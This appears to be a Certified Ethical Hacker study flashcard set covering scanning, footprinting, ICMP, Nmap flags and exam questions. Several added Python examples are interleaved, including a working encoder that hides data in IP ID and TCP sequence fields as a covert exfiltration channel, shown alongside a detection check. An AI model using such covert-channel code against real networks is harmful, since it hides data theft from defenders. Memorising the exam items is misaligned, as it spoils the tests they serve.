Certified Ethical Hacker


CIA triangle

Confidentiality, integrity, and availability (also called the CIA triad). These are the three properties that security controls protect.

D) Smurf attack (a directed broadcast is what lets the attacker's spoofed ICMP echo requests be answered, and so amplified, by every host on the segment; on Cisco IOS the per-interface command is "no ip directed-broadcast")

Disabling directed broadcasts on all routers is a mitigation for which attack? A) MAC flood B) SYN flood C) Routing table poisoning D) Smurf attack

No

Does the PNZ (Production Network Zone) hold users?

TCP/UDP 53

Domain Name System (DNS) Zone Transfer

boot record

GrayFish injects its malicious code into the ___ which handles the launching of Windows at each step

Source host

Hostname of the primary DNS server for the zone (there should be an associated NS record for this as well).

social engineering attacks

IP geolocation lookup tools such as IP2Location help collect geolocation information about the target's IP addresses, which helps attackers launch ___ such as spamming and phishing

Echo Reply

ICMP Type 0

Time Exceeded

ICMP Type 11

Destination Unreachable

ICMP Type 3

Source Quench

ICMP Type 4

klibc-horsepill.patch, horsepill_setopt, horsepill_infect

Horse Pill has three important parts

IP2Location, IP Location Finder, IP Address Geographical Location Finder, IP Location, GeoIP Lookup Tool, Geo IP Tool

IP Geolocation Lookup Tools

IP Identification Number, TCP Flow Control Method

IP Spoofing Detection Techniques

Linkedin.com Pipl.com

Personal information--like residential address and phone of employees can be found where?

Email

Phishing takes place using ____

TCP/UDP 389

Lightweight Directory Access Protocol (LDAP)

IP identification field, TCP acknowledgement number, TCP initial sequence number

Header fields in which data can be hidden (one in the IP header, two in the TCP header) are as follows:

distribute the payload covert channels

TCP parameters can be used by the attacker to ___ and to create ___
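The two cards above list the header fields an attacker can use to carry data and call the result a covert channel. As an added example (it is not code from the page or from any tool the page names), the following Python encoder/decoder hides a message in the IPv4 Identification field and the TCP initial sequence number of otherwise ordinary-looking SYN packets, and a small defender-side check shows why the channel is detectable. Packets are built as raw header bytes only; the addresses, ports and message are constructed placeholders and nothing is transmitted.

```python
import socket
import struct

IP_HDR = "!BBHHHBBH4s4s"   # ver/ihl, tos, total len, id, flags/frag, ttl, proto, csum, src, dst
TCP_HDR = "!HHIIBBHHH"     # sport, dport, seq, ack, data offset, flags, window, csum, urgptr
BYTES_PER_PACKET = 6       # 2 bytes in the IP ID + 4 bytes in the TCP ISN


def build_syn(src: str, dst: str, sport: int, dport: int, ip_id: int, isn: int) -> bytes:
    """Raw IPv4 + TCP SYN header bytes (no payload). Checksums are left at
    zero: a raw-socket sender fills them in and the decoder does not use them."""
    tcp = struct.pack(TCP_HDR, sport, dport, isn, 0, 5 << 4, 0x02, 8192, 0, 0)
    ip = struct.pack(IP_HDR, 0x45, 0, 20 + len(tcp), ip_id, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def encode(message: bytes, src: str, dst: str, dport: int = 80) -> list:
    """Prefix the message with its 16-bit length, pad to a multiple of six
    bytes, and carry each 6-byte chunk in the IP ID (2) and ISN (4) of one SYN."""
    if len(message) > 0xFFFF:
        raise ValueError("message too long for a 16-bit length prefix")
    payload = struct.pack("!H", len(message)) + message
    payload += b"\x00" * (-len(payload) % BYTES_PER_PACKET)
    packets = []
    for n, off in enumerate(range(0, len(payload), BYTES_PER_PACKET)):
        ip_id, isn = struct.unpack("!HI", payload[off:off + BYTES_PER_PACKET])
        packets.append(build_syn(src, dst, 40000 + n, dport, ip_id, isn))
    return packets


def decode(packets: list) -> bytes:
    """Recover the message from the IP ID and ISN fields, in packet order."""
    carried = bytearray()
    for pkt in packets:
        ihl = (pkt[0] & 0x0F) * 4                     # IP header length in bytes
        ip_id = struct.unpack("!H", pkt[4:6])[0]
        isn = struct.unpack("!I", pkt[ihl + 4:ihl + 8])[0]
        carried += struct.pack("!HI", ip_id, isn)
    length = struct.unpack("!H", carried[:2])[0]
    return bytes(carried[2:2 + length])


def ipid_looks_sequential(packets: list) -> bool:
    """Defender-side check: a normal host's IP IDs step upward by small
    amounts; IDs that carry data jump around. True when every step is <= 64."""
    ids = [struct.unpack("!H", p[4:6])[0] for p in packets]
    return all((b - a) % 0x10000 <= 64 for a, b in zip(ids, ids[1:]))


if __name__ == "__main__":
    # Constructed placeholders: addresses and message are not real.
    pkts = encode(b"exfil: secret", "10.0.0.5", "192.0.2.10")
    print(len(pkts), "packets;", decode(pkts), "; sequential IDs:", ipid_looks_sequential(pkts))
```

The same check that exposes this channel (IP IDs that do not walk upward by small steps) also flags the ISN variant if the sequence numbers of repeated SYNs from one host are compared, which is one reason modern stacks randomise both fields and why covert-channel detection looks at their distribution rather than their values.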

List Scan

This type of scan simply generates and prints a list of IPs/Names without actually pinging them

HTTP (TCP)

Port number 80

Scan result when a port is open (TCP Connect / Full Open Scan)

SYN --> / <-- SYN+ACK / ACK --> / RST --> (the scanner completes the handshake, then tears it down)

SYN/FIN Scanning (IP Fragments)

SYN/FIN (in small IP fragments) + port (n) ---> / <--- RST (if the port is closed)

SRV

Service records

TCP/UDP 5060, 5061

Session Initiation Protocol (SIP)

monitor everything

Spytech SpyAgent allows you to ___ users do on your computer

Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks

What are the five Hacking Phases?

Identify Security Objectives, Application Overview, Decompose Application, Identify Threats, Identify Vulnerabilities

What are the five sections of "threat modeling"?

Electronic Transaction and Code Sets, Privacy Rule, Security Rule, National Identifier Requirements, Enforcement

What are the five subsections of HIPAA

Preparation, assessment, conclusion

What are the three main phases of Pen Testing?

1) telnet www.certifiedhacker.com 80 (press Enter) 2) GET / HTTP/1.0 (press ENTER twice)

What command is used for Banner Grabbing using Telnet?

arp -d * or netsh interface ip delete arpcache

What commands on a Windows machine will clear the ARP cache?

Trojan

What is a common method of covertly installing a bot or a handler on a client computer?

Script kiddie

What is a derogatory term for a hacker who used other people's programs to attack networks and deface websites?

Low-level software that hides backdoor processes

What is a rootkit?

Rogue access point

What is an unauthorized access point called?

Session reconstruction

What is the process called when an IDS reassembles small packets before performing expression matching?

Application -- Layer 7, Presentation -- Layer 6, Session -- Layer 5

What layers of the OSI model does the PDU Data reside at?

C) It sets the home network as 202.78.55.6/24

What of the following is true regarding the Snort configuration file shown here: var HOME_NET 202.78.55.6/24 A) This rule configures Snort to alert on traffic from 202.78.55.6/24 B) This rule configures Snort to alert on traffic to 202.78.55.6/24 C) It sets the home network as 202.78.55.6/24 D) None of the above

Dictionary attack

What password cracking method uses an input list or file to discover the password?

Hybrid attack

What password cracking method uses word lists in combination with numbers and special characters?

Zenmap (the Nmap GUI, available for Windows as well as other platforms)

What tool can be used to perform ping sweeps (ICMP Echo scanning)?

Dig (BIND 9)

What tool is native to Unix systems but available as a download for Windows, and tests a DNS query and reports the results?

Mirroring

What tool type allows you to download an entire website onto the local system

D)Potential impact of the loss for each device

When IDS alerts report attacks on multiple devices, on which basis should the alerts be prioritized? A)Total number of alerts for each device B)Relative cost of each device C)Order in which they are recorded D)Potential impact of the loss for each device

It takes the prescribed action and stops evaluating the packet

When a router is examining a packet against an access control list and finds a traffic match, what action does the router take?

netsh advfirewall firewall show rule name=all

Which Windows Server 2012 command displays all rules within Windows Firewall?

Ethical hacker

Which kind of hacker only hacks for defensive purposes, so that he can think like a potential attacker?

A. APNIC

Your client's business is headquartered in Japan. Which regional registry would be the best place to look for footprinting information? A. APNIC B. RIPE C. ASIANIC D. ARIN E. LACNIC

Qualys FreeScan

Scans websites and applications for the OWASP Top 10 risks and for malware.

SEF (http://spl0it.org/projects/sef.html)

has great tools that can automate things such as extracting e-mail addresses out of websites and general preparation for social engineering. Also has ties into Metasploit payloads for easy phishing attacks.

Dumpster Diving

is looking for treasure in someone else's trash

PsInfo

list information about a system

script kiddie

unskilled, using other's scripts and tools

B. EDGAR Database

Which of the following is a good footprinting tool for discovering information on a publicly traded company's founding, history, and financial status? A. SpiderFoot B. EDGAR Database C. Sam Spade D. Pipl.com

A) Smartcard authentication

Which of the following is a mechanism associated with mandatory access control? A) Smartcard authentication B) User education C) Security policy D) Sign-in register

Session splicing

Which type of attack splits the attack payload into many small packets?

A. Implementing a split-horizon operation B. Restricting zone transfers

Brad is auditing an organization and is asked to provide suggestions on improving DNS security. Which of the following would be valid options to recommend? (Choose all that apply.) A. Implementing a split-horizon operation B. Restricting zone transfers C. Obfuscating DNS by using the same server for other applications and functions D. Blocking all access to the server on port 53

MAC flooding

Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?

Software used and its version; operating system used; sub-directories and parameters; filename, path, database field name, or query; scripting platform; contact details and CMS details

Browsing the target website may provide what kind of information?

OS Vulnerabilities

Buffer overflow vulnerabilities, bugs in operating system, unpatched operating system, etc.

Application Level Attacks

Buffer overflow, cross-site scripting, SQL injection, man-in-the-middle, session hijacking, denial-of-service, etc

True

Botnets are software applications that run automatic tasks over the Internet and often are coordinated to perform DDoS attacks? True or False

B. $207.50 (SLE = $1200 replacement + 5 h x $50 admin labour + 5 employees x 5 h x $25 lost productivity = $2075; ARO = 1 failure / 10 years = 0.1; ALE = SLE x ARO = $207.50)

Brad has done some research and determined a certain set of systems on his network fail once every ten years. The purchase price for each of these systems is $1200. Additionally, Brad discovers the administrators on staff, who earn $50 an hour, estimate five hours to replace a machine. Five employees, earning $25 an hour, depend on each system and will be completely unproductive while it is down. If you were to ask Brad for an ALE on these devices, what should he answer with? A. $2075 B. $207.50 C. $120 D. $1200

Active Banner Grabbing

- Specially crafted packets are sent to the remote OS and the responses are noted
- The responses are then compared with a database to determine the OS
- Responses differ between OSes because of differences in their TCP/IP stack implementations

Parallel, normal speed scan

-T3

Parallel, fast scan (aggressive timing template)

-T4

XML output

-oX

DNS scan (list scan)

-sL

NULL scan

-sN

Protocol scan

-sO

Ping scan (host discovery only; current Nmap spells it -sn)

-sP

RPC scan (removed from current Nmap; version detection, -sV, covers it)

-sR

TCP Window scan (infers open ports from the window size of RST replies)

-sW

Hping2 / Hping3

1) Command-line network scanning and packet-crafting tool for TCP/IP 2) Used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stack auditing, etc.

MarketWatch, The Wall Street Transcript, Alexa, Euromonitor, Experian, SEC Info, The Search Monitor

Competitive Intelligence - What Are the Company's Plans? What websites?

ABI/INFORM Global, SimilarWeb, AttentionMeter, Copernic Tracker, SEMRush

Competitive Intelligence - What Expert Opinions Say About the Company? What websites?

D. Cease testing immediately and contact authorities.

During an assessment, your pen test team discovers child porn on a system. Which of the following is the appropriate response? A. Continue testing and report findings at the out-brief. B. Continue testing but report findings to the business owners. C. Cease testing immediately and refuse to continue work for the client. D. Cease testing immediately and contact authorities.

A)To ensure critical data is not changed on the system

During security testing, what is the purpose of analyzing the interrupts within a piece of software? A)To ensure critical data is not changed on the system B)To test the access controls C)To validate the design D)To determine if secure coding principles were followed

HINFO

Host information record includes CPU type and OS

Redirect

ICMP Type 5

Echo Request

ICMP Type 8

Banner Grabbing Tools

ID Serve, Netcraft, Netcat, Telnet

- Send a SYN+ACK packet to the zombie machine to probe its IPID
- Every IPv4 packet carries an identification number (IPID); on a usable zombie it comes from a single counter that increases by one for every packet the host sends
- The zombie, not expecting a SYN+ACK, replies with a RST, disclosing its current IPID
- Record the IPID from the zombie's RST

IDLE Scan: Step 1

- Send a SYN packet to the target (port 80) with the source address spoofed to the zombie's
- If the port is open, the target sends SYN+ACK to the zombie, and the zombie answers the target with a RST (incrementing its IPID)
- If the port is closed, the target sends RST to the zombie, and the zombie sends nothing back

IDLE Scan: Step 2

-Probe "zombie" IPID again

IDLE Scan: Step 3

Prudent Policy

It provides maximum security while allowing known but necessary dangers. It blocks all services and only safe/necessary services are enabled individually; everything is logged

ISO/IEC 27001:2013

It provides requirements for creating, maintaining, and improving organizational IS (Information Security) systems.

Reduce Focus Area

It reduces attacker's focus area to specific range of IP address, networks, domain names, remote access, etc.

SSH

Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement

tcpdump -w capture.log

Jenny is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can she use?

A reverse ARP request maps to two hosts

MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?

directory structure

Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding ___ and other valuable information from the mirrored copy without multiple requests to web server

illegal access

Misconfiguration vulnerabilities affect web servers, application platforms, databases, networks, or frameworks that may result in _____ or possible owning of the system

IPv4/IPv6 domain names

NetScan Tools Pro lists ____ addresses, hostnames, _____, email addresses, and URLs automatically or with manual tools

map of the target network

Network range information assists attackers to create a ______

intelligence gathering

Network scanning is one of the components of ___ an attacker uses to create a profile of the target organization

Information gathering; sniffing and eavesdropping; spoofing; session hijacking and man-in-the-middle attacks; DNS and ARP poisoning; password-based attacks; denial-of-service attacks; compromised-key attacks; firewall and IDS attacks

Network threats

TCP/IP nodes and routes

NetworkView discovers _____ using DNS, SNMP, ports, NetBIOS, and WMI

DIG, DNSWatch, myDNSTools, DomainTools Professional Toolset, DNS Query Utility, DNS Records, DNS Lookup, DNSData View

DNS Interrogation Tools

http://www.dnsstuff.com http://network-tools.com

DNS Interrogation Tools

Zone transfers

DNS port 53 TCP is used by what?

Name lookups

DNS port 53 UDP is used by what?

creates a back channel

DNS tunneling ___ to access a remote server and applications

port 53 (TCP and UDP)

DNS uses what port?

B)It detects which computers are online.

During a recent review of the events on your company's network, you discover that an attacker used Nmap to perform a ping sweep on your company's network. Which statement is true regarding this type of scan? A)It checks for open UDP ports. B)It detects which computers are online. C)It determines IP trust-based relationships between hosts. D)It sets the FIN, URG and PUSH flags in the TCP header.

Does not work on IPv6

Does NetBIOS name resolution work on IPv6?

No does not work

Does an XMAS scan work against Microsoft Windows?

(TTL) open

In the TTL-based ACK flag probe, if the TTL of the returned RST packet is less than 64, the port is ___.

(Window) open

Doing ACK flag probe using the Window version if the RST packet has anything other than zero, the port is ___.

(Full Connect) SYN/ACK RST

Doing a Full connect open ports respond with ___ and closed ports will respond with a ___.

(Stealth) SYN/ACK RST

Doing a Stealth connect open ports respond with ___ and closed ports respond with ____.

The value of the next sequence number in the packet being acknowledged or replied to

During a TCP handshake, which value is used for the acknowledgement number in a reply packet?

RST

During a Xmas tree scan what indicates a port is closed?

C)External interface of DMZ firewall

During a penetration test, a tester conducts the following scan: hping3 -A 209.15.13.134 -p 80 You receive back no response, indicating the port is filtered. Which type of network interface is being scanned? A)Internal interface of DMZ firewall B)Internal interface of public web server C)External interface of DMZ firewall D)External interface of public web server

A)IT security analyst

During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor? A)IT security analyst B)Business manager C)Facilities manager D)CIO

D)30 hosts in 8 subnets

You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged? A)14 hosts in 16 subnets B)126 hosts in 2 subnets C)62 hosts in 4 subnets D)30 hosts in 8 subnets E)254 hosts in 1 subnet

A)N-tier

You have a front-end web server, an application server, and a database server that each perform a single and unique role in a group. What BEST describes this architecture? A)N-tier B)Service oriented architecture C)Separation of duties D)Dual control

Agentless auditing, compliance checks, content audits, customized reporting, high-speed vulnerability discovery, in-depth assessments, mobile device audits, patch management integration, scan policy design and execution

What are some features of Nessus?

- Network topology discovery and mapping
- Export network diagrams to Visio
- Network mappings for regulatory compliance
- Multi-level network discovery
- Auto-detect changes to network topology

What are some features of Network Topology Mapper?

Network vulnerabilities; open ports and running services; application and service vulnerabilities; application and service configuration errors

What are some things that Vulnerability Scanning checks for?

Website-Watcher, Change Detection, Follow That Page, Page2RSS, Watch That Page, Check4Change, OnWebChange, Infominder, TrackedContent, Websnitcher, Update Scanner

What are some tools for Monitoring Web Updates?

Google Earth, Google Maps, Wikimapia, National Geographic Maps, Yahoo Maps, Bing Maps

What are some tools for finding the geographical location?

SiteDigger (www.mcafee.com), MetaGoofil (www.edge-security.com)

What are some tools to make Google hacking more powerful?

C)Automated vulnerability assessment tool

What is Nessus? A)Hacking tool that targets Web servers B)Security scanner that discovers hosts and services on a computer network C)Automated vulnerability assessment tool D)Wireless network detector, sniffer, and intrusion detection system

nmap -sn -PE cert.org/24 152.148.0.0/16 (-sn: host discovery without a port scan; -PE: ICMP echo request probes. Older Nmap releases spelled the ping sweep -sP; a bare -P is not a valid option.)

What is a nmap command for ICMP Echo Scanning

A way to reveal vulnerabilities

What is a vulnerability scan designed to provide to those executing it?

Identify a user

What is an SID used to do?

A)Covert channel

What is an illegitimate transfer of information between processes on a system or systems on a network? A)Covert channel B)Out of band C)API D)Privilege escalation

C. A UDP port scan of ports 1-1024 on a single address

What is being attempted with the following command? nc -u -v -w2 192.168.1.100 1-1024 A. A full connect scan on ports 1-1024 for a single address B. A full connect scan on ports 1-1024 for a subnet C. A UDP port scan of ports 1-1024 on a single address D. A UDP scan of ports 1-1024 on a subnet

Target of evaluation (TOE)

What is being tested.

Frames

What is built in the Data Link Layer?

Trojan horse attack

What is it called when an attacker attempts to steal passwords through an innocent looking application?

Four 16-bit header fields (Source Port, Destination Port, Length, Checksum; 8 bytes in all) followed by the Data

What is the UDP datagram structure?
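As an added example for the datagram structure above (this is not code from the page), the following Python builds and parses a UDP datagram with the four 16-bit fields, and computes and verifies the checksum over the IPv4 pseudo-header, which is the part most hand-written parsers get wrong. It also rejects a Length field that disagrees with what was received, the mismatch that lets one sender feed two parsers different views of the same datagram. The addresses, ports and payload are constructed placeholders.

```python
import socket
import struct

UDP_HDR = "!HHHH"   # source port, destination port, length, checksum: four 16-bit fields
UDP_PROTO = 17


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src: str, dst: str, udp_len: int) -> bytes:
    """IPv4 pseudo-header: src, dst, zero byte, protocol, UDP length."""
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, UDP_PROTO, udp_len)


def udp_checksum(src: str, dst: str, udp: bytes) -> int:
    """Checksum over pseudo-header + UDP header + data, with the checksum
    field zeroed. A computed 0 is sent as 0xFFFF because 0 on the wire means
    'no checksum' (RFC 768)."""
    csum = (~ones_complement_sum(pseudo_header(src, dst, len(udp)) + udp)) & 0xFFFF
    return csum or 0xFFFF


def build_udp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    length = 8 + len(payload)
    unchecked = struct.pack(UDP_HDR, sport, dport, length, 0) + payload
    return struct.pack(UDP_HDR, sport, dport, length, udp_checksum(src, dst, unchecked)) + payload


def parse_udp(src: str, dst: str, datagram: bytes) -> dict:
    """Split a datagram into its fields and verify the checksum. Raises
    ValueError on a truncated header or a Length field that does not match
    the bytes actually received."""
    if len(datagram) < 8:
        raise ValueError("truncated UDP header")
    sport, dport, length, csum = struct.unpack(UDP_HDR, datagram[:8])
    if length < 8 or length != len(datagram):
        raise ValueError("UDP length field %d != received %d bytes" % (length, len(datagram)))
    if csum == 0:
        valid = None   # sender chose not to checksum; allowed over IPv4
    else:
        # With the checksum field included, a correct datagram sums to all ones.
        valid = ones_complement_sum(pseudo_header(src, dst, length) + datagram) == 0xFFFF
    return {"sport": sport, "dport": dport, "length": length,
            "checksum": csum, "checksum_ok": valid, "data": datagram[8:]}


if __name__ == "__main__":
    dg = build_udp("10.0.0.1", "10.0.0.2", 53000, 53, b"hi")   # constructed sample
    print(parse_udp("10.0.0.1", "10.0.0.2", dg))
```

Because the checksum covers the pseudo-header, a datagram whose source address has been spoofed or rewritten without recomputing the checksum fails verification, which is worth remembering when reading captures of spoofed traffic.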

172.17.255.255

What is the broadcast address in the 172.17.0.0/16 network?
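The ping-sweep question above (204.17.5.0/27) and this broadcast-address card are both instances of one calculation. As an added example (not code from the page), the following Python derives usable host count, first and last host, broadcast address, and the number of equal-size subnets carved from the classful block, which is how the exam question counts "8 subnets". The /31 and /32 special cases are handled because they have no network/broadcast pair.

```python
import ipaddress


def classful_prefix(net: ipaddress.IPv4Network) -> int:
    """Default mask implied by the first octet (Class A /8, B /16, C /24);
    the exam-style question counts subnets relative to this block."""
    first_octet = int(net.network_address) >> 24
    if first_octet < 128:
        return 8
    if first_octet < 192:
        return 16
    return 24


def subnet_facts(cidr: str) -> dict:
    """Summarise a CIDR block the way a ping sweep or broadcast question asks for it."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen < 31:
        usable = net.num_addresses - 2          # network and broadcast are not hosts
        first_host = net.network_address + 1
        last_host = net.broadcast_address - 1
    else:
        usable = net.num_addresses              # RFC 3021 /31 point-to-point, or a /32
        first_host = net.network_address
        last_host = net.broadcast_address
    base = classful_prefix(net)
    subnets = 2 ** (net.prefixlen - base) if net.prefixlen >= base else None
    return {
        "network": str(net.network_address),
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "usable_hosts": usable,
        "first_host": str(first_host),
        "last_host": str(last_host),
        "subnets_in_classful_block": subnets,
    }


if __name__ == "__main__":
    for cidr in ("204.17.5.0/27", "172.17.0.0/16", "10.1.2.3/24"):
        print(cidr, subnet_facts(cidr))
```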

telnet <website name> 80

What is the command to retrieve header information from a web server using Telnet?

B)2048 bits

What is the current recommended RSA key length for a PKI? A)8192 bits B)2048 bits C)4096 bits D)1024 bits

Network, software or service available outside of normal internet traffic and search engines

What is the darknet?

An egg

What is the data payload called when ADMutate is in use?

get proper authorization

What is the first step in Pen Testing?

Footprinting

What is the first step in information gathering and provides a high-level blueprint of the target system or network.

A)Protect you when you are off the LAN

What is the main advantage of a host-based Intrusion Detection/Protection System (IDS/IPS) over a network-based solution? A)Protect you when you are off the LAN B)Requires port scanning C)Requires less training D)Resides at the perimeter of the network

Heap

What is the name for dynamic memory space that, unlike the stack, doesn't rely on sequential ordering or organization?

Netcat

What is the name of a simple UNIX utility that reads and writes data across network connections using either TCP or UDP?

Open Web Application Security Project (OWASP)

What is the name of the online community dedicated to web application security, known for their top 10 list of web vulnerabilities?

Scanning

What is the next step after footprinting a target?

B) The ethical hacker has authorization to proceed from the target owner

What is the primary difference between an ethical hacker and a cracker? A) The ethical hacker points out vulnerabilities but does not exploit them B) The ethical hacker has authorization to proceed from the target owner C) The ethical hacker does not use the same tools and techniques D) The ethical hacker does not have financial motivation

Hashing

What is the process of deriving a value that can be used to determine if any changes have been made in a message called?

A)It takes a message of arbitrary length as input and produces a 128-bit hash value output.

What is the purpose of MD5? A)It takes a message of arbitrary length as input and produces a 128-bit hash value output. B)It takes a message of up to 1 MB in size and produces a 128-bit hash value output. C)It takes a message of up to 1 MB is size and produces a 160-bit hash value output. D)It takes a message of arbitrary length as input and produces a 160-bit hash value output.

It evaluates how well a company adheres to its stated security policy

What is the purpose of a security audit?

It validates their correct application

What is the purpose of conducting security assessments on network resources?

To verify that files have not been changed or altered

What is the purpose of integrity hashes?

C)To automate SQL injection attacks

What is the purpose of using the Mole tool? A)To extract (reverse engineer) data points from a graph B)To read and write data across network connections C)To automate SQL injection attacks D)To recover passwords in a Windows system

C. SYN/ACK

What is the second step in the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK-SYN E. FIN

nslookup [-options] {hostname | [server]}

What is the syntax for nslookup?

N-tier

What is the term for a design with a front-end server, an application server, and a database server that as a group perform a single and unique role?

Threat agent

What is the term for a person who attempts to exploit a threat?

False positive

What is the term for a system incorrectly preventing traffic or actions that should be allowed?

Mantrap

What is the term for a two-door system with a small room between them which allows for visual verification of each person entering a building?

Threat

What is the term for a vulnerability that exists that has the potential to be exploited, as compared to a vulnerability that exists but has no chance of being exploited?

Vulnerability

What is the term for a weakness or error that can lead to a compromise?

Covert channel

What is the term for any method used to bypass multi-level security solutions?

OSSTMM (Open Source Security Testing Methodology Manual)

What is the widely-adopted, peer-reviewed manual for operational security testing and analysis?

U.S. Computer Security Incident Response Team (CSIRT)

What organization acts as a single point of contact for reporting security incidents in the US?

gaining access phase

What phase of ethical hacking is when true attacks are leveled against the targets enumerated.

maintaining access

What phase of ethical hacking makes use of Trojans, rootkits, or any number of other methods.

gaining access

What phase of ethical hacking would you deliver a buffer overflow or SQL injection against a web application.

scanning and enumeration phase

What phase of ethical hacking would you do a ping sweep, network mapper, or a vulnerability scanner.

covering tracks

What phase of ethical hacking, attackers attempt to conceal their success and avoid detection by security professionals.

maintaining access phase

What phase of ethical hacking, hackers attempt to ensure they have a way back into the machine or system they've already compromised.

Regional Internet Registries (RIRs)

What provides overall management of the public IP address space within a given geographic region?

Upgrade the kernel immediately

What should you do when no known workarounds exists to eliminate a Linux kernel vulnerability?

ARP poisoning

What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?

Outside affiliate

What threat type is a non-trusted individual who uses open access to gain access to an organization's resources?

Insider affiliate

What threat type is a spouse, friend, or even client of an employee who uses the employee's credentials to gain access?

Pure insider

What threat type is an employee with all the rights and access associated with being employed by the company?

Encryption, integrity, and non-repudiation

What three protections does public key cryptography provide?

Absorb Add more services Shut down services

What three ways can you handle a DDoS attack?

CyberGhost

What tool allows you to protect your online privacy, surf anonymously, and access blocked or censored content? It hides your IP address and replaces it with one of your choice, allowing you to surf anonymously.

TOR

What tool allows you to protect your privacy and defend yourself against network surveillance and traffic analysis

GFI LanGuard

What tool assists in asset inventory, change management, risk analysis, and proving compliance?

Website Watcher (http://aignes.com)

What tool can be used to check web pages for changes, automatically notifying you when there's an update?

Colasoft's Packet Builder

What tool can be used to craft segments and manipulate flags? This tool can also create fragmented packets to bypass IDS (and possibly firewalls)?

Netcraft http://www.netcraft.com

What tool can you use to find a company's restricted URLs?

ARIN

What tool can you use to find network ranges for a target and/or contact information?

whois

What tool can you use to query registries and return information such as domain ownership, address, location, and phone numbers?

OpenStego

What tool can do the following? Data hiding: hide any data within a cover file (e.g. images). Watermarking: mark files (e.g. images) with an invisible signature, which can be used to detect unauthorized copying.

Shodan

What tool is designed to help you find specific types of computers (routers, servers, and so on) connected to the Internet?

The next sequence number and acknowledgment number in an exchange

What two values must a hacker guess or estimate to highjack a TCP session?

ARP poisoning

What type of attack changes the IP address to MAC address mappings on two other devices, such that the two devices send frames to the attacker when they think they are sending frames to one another?

Brute force password attack

What type of attack is mitigated by an account lockout policy?

Denial of Service (DoS)

What type of attack overwhelms a target with requests that utilize all resources on the target?

Social engineering

What type of attack uses nontechnical means to obtain information useful in a network attack?

Two-factor or multi-factor authentication

What type of authentication is being performed when a USB token and retina scan are both required?

Circuit level gateway

What type of firewall monitors the TCP handshake between packets to determine whether a requested session is legitimate?

Personal firewall software

What type of software is Zonealarm?

An automatic SQL Injection exploitation tool

What type of tool is Mole?

SNMPv3

What version of SNMP provides authentication and encryption of its messages (in place of clear-text community strings)?

SNMPv1

What version of SNMP sends community strings in clear text (as does v2c)?

Microsoft Baseline Security Analyzer (MBSA)

What vulnerability tool is specifically designed to locate potential exploits in the products from Microsoft?

Domain Name System Security Extensions (DNSSEC)

What was created to protect against DNS poisoning?

Truth in Caller ID Act

What was started in 2010 and states a person who knowingly transmits misleading caller ID information can be hit with a $10,000 fine per incident?

WEP

What wireless protocol has been compromised because of the way it implements the RC4 algorithm?

Telnet request to port 80 on a machine

What would the output below represent?

    C:\> telnet 192.168.1.15 80
    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Sat, 29 Jan 2011 11:14:19 GMT
    Content-Type: text/html
    Content-Length: 87

    <html><head><title>Error</title></head>
    <body>The parameter is incorrect.</body></html>

    Connection to host lost.
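The telnet banner-grab cards on this page (the "telnet host 80 / GET / HTTP/1.0" procedure and the IIS 5.0 transcript above) boil down to: open a TCP connection, send a minimal request, and read the Server header out of the reply. As an added example (not code from the page), the following Python does the same with a socket and separates the parsing step so it can be run against a constructed copy of the transcript above without any network. The host and port in grab_banner are parameters you supply; the sample response is constructed from the card and is not a live capture.

```python
import re
import socket

REQUEST = b"GET / HTTP/1.0\r\n\r\n"   # HTTP/1.0 needs no Host header, which is why the card uses it


def parse_banner(response: bytes) -> dict:
    """Pull the status line and headers out of a raw HTTP response."""
    head = response.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").splitlines()
    if not lines or not lines[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response")
    parts = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {
        "status_line": lines[0],
        "status_code": int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None,
        "server": headers.get("server"),
        "headers": headers,
    }


def leaks_version(server_header) -> bool:
    """True when the Server header carries a version number, the detail an
    attacker uses to pick exploits and a defender should strip."""
    return bool(server_header) and re.search(r"\d+\.\d+", server_header) is not None


def grab_banner(host: str, port: int = 80, timeout: float = 3.0) -> dict:
    """Live equivalent of the telnet procedure: connect, send GET, read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(REQUEST)
        data = b""
        while len(data) < 8192:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    return parse_banner(data)


# Constructed sample mirroring the transcript on this page (whitespace normalised).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Date: Sat, 29 Jan 2011 11:14:19 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 87\r\n"
    b"\r\n"
    b"<html><head><title>Error</title></head><body>The parameter is incorrect.</body></html>"
)

if __name__ == "__main__":
    info = parse_banner(SAMPLE_RESPONSE)
    print(info["status_line"], "|", info["server"], "| leaks version:", leaks_version(info["server"]))
```

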